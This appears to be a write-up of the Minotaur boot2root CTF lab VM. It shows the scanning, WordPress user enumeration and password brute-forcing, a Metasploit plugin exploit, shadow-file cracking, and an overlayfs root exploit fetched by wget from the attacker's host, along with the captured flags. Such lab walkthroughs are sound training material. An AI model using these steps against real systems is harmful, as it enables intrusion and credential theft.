SecTalks: BNE0x00 – Minotaur
Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.
This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
There is some problem with finding the vm in my host-only network.
To tacle this problem I tried a horizontal scan at port 80.
nmap -v -O 192.168.56.0/24 -Pn -p 80
After I found the host, I went for a vertical scan at the found host.
nmap -A -p- -T4 192.168.56.223
Port 22 (SSH), 80 (web) and 2020 (FTP) are open. Also with port 2020 anonymous ftp login is allowed. After I tried the web server, which had nothing of importance, I tried SSH.
SSH was protected by authentication. So finally I went for the third and final option.
Anonymous FTP login
Let’s log in with the username ‘anonymous’.
ftp 192.168.56.223 2020
Well that’s not it. My options are running short. I need more information. Time to give Dirb another try, but this time with a different list.
dirb http://192.168.56.223 /usr/share/wordlists/dirb/big.txt
Nice. Dirb found the directory ‘bull’ and it seems it runs on wordpress. Let’s take a look.
Looks like the website runs on WordPress version 4.2.2. Time to use wpscan.
wpscan –url http://192.168.56.223 –enumerate u
There is the username. Now for the password. The hint in the description said I needed to generate my own wordlist, because it wasn’t on rockyou.txt. So let’s start generating wordlists.
cewl -w wordlist.txt http://192.168.56.223/bull/
wpscan –url http://192.168.56.223/bull/ –wordlist /wordlist.txt –username bully –threads 50
Nothing. Hmmmm. The hint was clear. My list isn’t sufficient enough. I need to mix up the collected words in my list more. Maybe I can find something with Google.
Not really anything I was looking for. But there were an awful lot of mentions to John the Ripper. Looking in Kali at the options of this program, there was an option for mangling words. With this information I started my searches on Google different and after a while I found a site with the right answer (https://www.win.tue.nl/~aeb/linux/john/john.html).
john –wordlist=wordlist.txt –rules –stdout > mangled-wordlist.txt
Now let’s get back to a previously found vulnerability during the first wpscan.
Time to start up metasploit and search the database for Slideshow Gallery exploit.
Now to get a shell and look around.
We have a flag. But looks like there is more…….
find / -print | grep -i flag.txt
Back to the shadow.bak file. Let’s download it and run it with John the Ripper.
meterpreter > download /tmp/shadow.bak
[*] downloading: /tmp/shadow.bak -> shadow.bak
[*] download : /tmp/shadow.bak -> shadow.bak
heffer@minotaur:/home$ cd heffer
heffer@minotaur:~$ cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0
minotaur@minotaur:/home/heffer$ cd /home/minotaur
minotaur@minotaur:~$ cat flag.txt
Congrats! You’ve found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!
But can you get /root/flag.txt ?
Why yes I can!
minotaur@minotaur:~$ cat /etc/*-release
DISTRIB_DESCRIPTION=”Ubuntu 14.04.2 LTS”
VERSION=”14.04.2 LTS, Trusty Tahr”
PRETTY_NAME=”Ubuntu 14.04.2 LTS”
So Ubuntu 14.04. That means I’m going for ‘overlayfs’ Local Root Shell (https://www.exploit-db.com/exploits/37292/).
minotaur@minotaur:~$ wget http://192.168.56.102/overlayfs.c
–2016-07-29 01:36:49– http://192.168.56.102/overlayfs.c
Connecting to 192.168.56.102:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘overlayfs.c’
100%[======================================>] 4,968 –.-K/s in 0s
2016-07-29 01:36:49 (152 MB/s) – ‘overlayfs.c’ saved [4968/4968]
flag.txt overlayfs.c peda
minotaur@minotaur:~$ gcc overlayfs.c -o overlayfs
minotaur@minotaur:~$ chmod 777 overlayfs
flag.txt overlayfs overlayfs.c peda
child threads done
creating shared library
Woot! Now let’s get final flag.
# cd /root
flag.txt peda quotes.txt
# cat flag.txt
After a different approach I learned that the final flag was much simpler to uptain.
The whole getting root was not necessary seeing that user minotaur was able to run every program as root. But hey…..It was fun anyway.